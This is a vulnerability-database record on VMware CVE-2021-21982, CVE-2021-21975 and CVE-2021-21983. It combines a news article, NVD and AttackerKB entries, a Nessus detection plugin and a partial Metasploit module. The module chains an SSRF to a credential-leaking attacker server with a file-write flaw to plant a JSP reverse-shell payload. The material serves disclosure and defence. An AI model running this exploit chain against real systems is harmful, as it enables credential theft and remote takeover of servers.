{"id": "THN:4640BEB83FE3611B6867B05878F52F0D", "type": "thn", "bulletinFamily": "info", "title": "Critical Auth Bypass Bug Found in VMware Data Center Security Product", "description": "[](<https://thehackernews.com/images/-LL794hm32nE/YG1jF7U5ZaI/AAAAAAAACMU/Q1a-oTSPl_st9NtxIFPobNiHuZtjk9boQCLcBGAsYHQ/s0/vmware.jpg>)\n\nA critical vulnerability in the VMware Carbon Black Cloud Workload appliance could be exploited to bypass authentication and take control of vulnerable systems.\n\nTracked as CVE-2021-21982, the flaw is rated 9.1 out of a maximum of 10 in the CVSS scoring system and affects all versions of the product prior to 1.0.1. \n\nCarbon Black Cloud Workload is a data center security product from VMware that aims to protect critical servers and workloads hosted on vSphere, the company's cloud-computing virtualization platform.\n\n\"A URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2021-0005.html>) in its advisory, thereby allowing an adversary with network access to the interface to gain access to the administration API of the appliance.\n\n[](<https://go.thn.li/inside11> \"password auditor\" )\n\nArmed with the access, a malicious actor can then view and alter [administrative configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>), the company added.\n\nIn addition to releasing a fix for CVE-2021-21982, VMware has also [addressed](<https://www.vmware.com/security/advisories/VMSA-2021-0004.html>) two separate bugs in its vRealize Operations Manager solution that an attacker with network access to the API could exploit to carry out Server Side Request Forgery ([SSRF](<https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/>)) attacks to steal administrative credentials (CVE-2021-21975) and write files to arbitrary locations on the underlying [photon](<https://github.com/vmware/photon>) operating system (CVE-2021-21983).\n\nThe product is primarily designed to monitor and optimize the performance of the virtual infrastructure and support features such as workload balancing, troubleshooting, and compliance management.\n\nEgor Dimitrenko, a security researcher with Positive Technologies, has been credited with reporting all three flaws.\n\n[](<https://go.thn.li/inside22> \"password auditor\" )\n\n\"The main risk is that administrator privileges allow attackers to exploit the second vulnerability\u2014CVE-2021-21983 (an arbitrary file write flaw, scored 7.2), which allows executing any commands on the server,\" Dimitrenko [said](<https://www.ptsecurity.com/ww-en/about/news/vmware-fixes-dangerous-vulnerabilities-in-software-for-infrastructure-monitoring-discovered-by-positive-technologies/>). \"The combination of two security flaws makes the situation even more dangerous, as it allows an unauthorized attacker to obtain control over the server and move laterally within the infrastructure.\"\n\nVMware has released patches for vRealize Operations Manager versions 7.0.0, 7.5.0, 8.0.1, 8.1.1, 8.2.0 and 8.3.0. The company has also published workarounds to mitigate the risks associated with the flaws in scenarios where the patch cannot be installed or is not available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-04-07T08:03:00", "modified": "2021-04-07T09:38:17", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "href": "https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"], "immutableFields": [], "lastseen": "2021-04-07T12:00:43", "viewCount": 50, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95"]}, {"type": "cve", "idList": ["CVE-2021-21983", "CVE-2021-21975", "CVE-2021-21982"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162349"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/VMWARE_VROPS_MGR_SSRF_RCE/"]}, {"type": "nessus", "idList": ["VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF"]}, {"type": "threatpost", "idList": ["THREATPOST:98B57FBF6D83FA4D12BEE06C0281FF91", "THREATPOST:E3FA0D5BB017B7DD39D5924D32A9A668", "THREATPOST:6C1025257B798335D913F95B63229B76"]}], "modified": "2021-04-07T12:00:43", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-04-07T12:00:43", "rev": 2}, "vulnersScore": 6.0}}

{"attackerkb": [{"lastseen": "2021-05-06T15:15:52", "bulletinFamily": "info", "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "description": "Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 03, 2021 7:41am UTC reported:\n\nPlease see [CVE-2021-21975\u2019s Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>). CVE-2021-21975 can be chained with CVE-2021-21983 to achieve unauthed RCE.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2021-04-06T00:00:00", "id": "AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "href": "https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983", "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21983", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2021-05-14T09:17:41", "bulletinFamily": "info", "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 31, 2021 10:35pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>) or [CVE-2021-21983\u2019s assessment](<https://attackerkb.com/assessments/fce71f33-eb17-490f-a80e-c4cd5059e0dc>).\n\n**Update:** According to GreyNoise, [attackers are scanning for CVE-2021-21975](<https://twitter.com/nathanqthai/status/1379888484865957891>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2021-04-06T00:00:00", "id": "AKB:DA3A63D5-4ECE-465D-8289-BD8119F15E95", "href": "https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975", "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21975", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "cve": [{"lastseen": "2021-04-28T11:49:15", "description": "VMware Carbon Black Cloud Workload appliance 1.0.0 and 1.01 has an authentication bypass vulnerability that may allow a malicious actor with network access to the administrative interface of the VMware Carbon Black Cloud Workload appliance to obtain a valid authentication token. Successful exploitation of this issue would result in the attacker being able to view and alter administrative configuration settings.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2021-04-01T19:15:00", "title": "CVE-2021-21982", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21982"], "modified": "2021-04-06T16:29:00", "cpe": ["cpe:/a:vmware:carbon_black_cloud_workload:1.0.1"], "id": "CVE-2021-21982", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21982", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:vmware:carbon_black_cloud_workload:1.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-05-06T07:39:31", "description": "Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.", "edition": 4, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2021-03-31T18:15:00", "title": "CVE-2021-21983", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983"], "modified": "2021-05-05T14:23:00", "cpe": ["cpe:/a:vmware:cloud_foundation:3.8.1", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:cloud_foundation:3.0.1.1", "cpe:/a:vmware:cloud_foundation:3.0.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0.1", "cpe:/a:vmare:vrealize_operations_manager:8.3.0", "cpe:/a:vmware:cloud_foundation:3.5.1", "cpe:/a:vmware:cloud_foundation:3.10", "cpe:/a:vmware:cloud_foundation:3.7", "cpe:/a:vmare:vrealize_operations_manager:7.5.0", "cpe:/a:vmare:vrealize_operations_manager:8.1.1", "cpe:/a:vmware:cloud_foundation:3.5", "cpe:/a:vmware:cloud_foundation:3.7.2", "cpe:/a:vmware:cloud_foundation:3.9.1", "cpe:/a:vmare:vrealize_operations_manager:8.1.0", "cpe:/a:vmware:cloud_foundation:3.9", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:cloud_foundation:3.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.1", "cpe:/a:vmware:cloud_foundation:3.7.1", "cpe:/a:vmare:vrealize_operations_manager:8.0.1", "cpe:/a:vmware:cloud_foundation:3.8", "cpe:/a:vmare:vrealize_operations_manager:8.0.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0", "cpe:/a:vmare:vrealize_operations_manager:7.0.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmare:vrealize_operations_manager:8.2.0"], "id": "CVE-2021-21983", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21983", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vmware:cloud_foundation:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-05-01T09:49:22", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-31T18:15:00", "title": "CVE-2021-21975", "type": "cve", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2021-04-30T17:28:00", "cpe": ["cpe:/a:vmware:cloud_foundation:3.8.1", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:cloud_foundation:3.0.1.1", "cpe:/a:vmware:cloud_foundation:3.0.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0.1", "cpe:/a:vmare:vrealize_operations_manager:8.3.0", "cpe:/a:vmware:cloud_foundation:3.5.1", "cpe:/a:vmware:cloud_foundation:3.10", "cpe:/a:vmware:cloud_foundation:3.7", "cpe:/a:vmare:vrealize_operations_manager:7.5.0", "cpe:/a:vmare:vrealize_operations_manager:8.1.1", "cpe:/a:vmware:cloud_foundation:3.5", "cpe:/a:vmware:cloud_foundation:3.7.2", "cpe:/a:vmware:cloud_foundation:3.9.1", "cpe:/a:vmare:vrealize_operations_manager:8.1.0", "cpe:/a:vmware:cloud_foundation:3.9", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:cloud_foundation:3.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.1", "cpe:/a:vmware:cloud_foundation:3.7.1", "cpe:/a:vmare:vrealize_operations_manager:8.0.1", "cpe:/a:vmware:cloud_foundation:3.8", "cpe:/a:vmare:vrealize_operations_manager:8.0.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0", "cpe:/a:vmare:vrealize_operations_manager:7.0.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmare:vrealize_operations_manager:8.2.0"], "id": "CVE-2021-21975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21975", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:cloud_foundation:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmare:vrealize_operations_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9.1:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-04-29T13:29:52", "description": "The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to\n7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or\n8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side\n request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write\n files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)", "edition": 4, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H"}, "published": "2021-03-31T00:00:00", "title": "VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-03-31T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL", "href": "https://www.tenable.com/plugins/nessus/148255", "sourceData": "# (C) Tenable Network Security, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148255);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/28\");\n\n script_cve_id(\"CVE-2021-21975\", \"CVE-2021-21983\");\n script_xref(name:\"VMSA\", value:\"2021-0004\");\n\n script_name(english:\"VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"VMware vRealize Operations running on the remote host is affected by a Server Side\nRequest Forgery and Arbitrary File Write vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to\n7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or\n8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side\n request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write\n files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vRealize Operations Manager version\n7.5.0.17771878, 8.0.1.17771851, 8.1.1.17772462, 8.2.0.17771778, 8.3.0.17787340 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21983\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vRealize Operations (vROps) Manager SSRF RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_operations\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vrealize_operations_manager_webui_detect.nbin\");\n script_require_keys(\"installed_sw/vRealize Operations Manager\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'vRealize Operations Manager';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nconstraints = [\n {'min_version':'7.5.0', 'fixed_version':'7.5.0.17771878'},\n {'min_version':'8.0.0', 'fixed_version':'8.0.1.17771851'}, # For 8.0.0, 8.0.1\n {'min_version':'8.1.0', 'fixed_version':'8.1.1.17772462'}, # For 8.1.0, 8.1.1\n {'min_version':'8.2.0', 'fixed_version':'8.2.0.17771778'},\n {'min_version':'8.3.0', 'fixed_version':'8.3.0.17787340'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "metasploit": [{"lastseen": "2021-05-07T20:21:32", "description": "This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user. The following vRealize Operations Manager versions are vulnerable: * 7.0.0 * 7.5.0 * 8.0.0, 8.0.1 * 8.1.0, 8.1.1 * 8.2.0 * 8.3.0 Version 8.3.0 is not exploitable for creds and is therefore not supported by this module. Tested successfully against 8.0.1, 8.1.0, 8.1.1, and 8.2.0.\n", "published": "2021-04-21T15:42:10", "type": "metasploit", "title": "VMware vRealize Operations (vROps) Manager SSRF RCE", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-05-06T23:30:20", "id": "MSF:EXPLOIT/LINUX/HTTP/VMWARE_VROPS_MGR_SSRF_RCE/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested successfully against 8.0.1, 8.1.0,\n 8.1.1, and 8.2.0.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def 